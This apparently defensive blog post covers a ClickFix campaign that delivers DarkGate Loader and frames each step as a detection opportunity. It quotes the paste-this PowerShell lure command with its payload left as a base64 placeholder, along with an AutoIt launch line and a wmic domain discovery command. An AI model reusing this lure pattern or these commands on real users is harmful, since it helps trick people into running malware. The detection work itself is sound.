032. DarkGate Delivery via ClickFix Attack: Detection and Hunting Opportunities
Hello everyone! Today we're going to talk about DarkGate Loader and ClickFix attacks. Both are quite common, I'm not sure about ClickFix, but DarkGate is used by adversaries even is CIS.
Let's look at a recent ClickFix campaign analysed by Malwarebytes Labs. The chain starts from a malicious Google ad. If the victim clicks it, he or she sees a fake “Verify you are human” page. After checking the box, the victim sees the instructions on how to launch the Run dialog and paste a malcious PowerShell script:
cmd /c "powershell -w h -e [base64_encoded_commands] && I am human - Ray ID:4092"
As you can see, the threat actors added an interesting string to make the "verification" look more legitimate. You definitely can use it for detection! If we decode Base64, we can see very common cmdlets used by adversaries for downloading and running malicious files: "Invoke-WebRequest" and "Start-Process". So, this is another detection opportunity!
To run DarkGate Loader, the threat actors usually use AutoIt, for example:
"c:\temp\test\Autoit3.exe" c:\temp\test\script.a3x
You can use this knowledge for detection and hunting:
- Look for AutoIt interpreter and AutoIt scripts in uncommon locations
- Look for renamed AutoIt executable - use metadata: "AutoIt v3 Script", "AutoIt3.exe", etc.
cmd.exe /c wmic ComputerSystem get domain
Yes, this is another great detection opportunity!
Comments
Post a Comment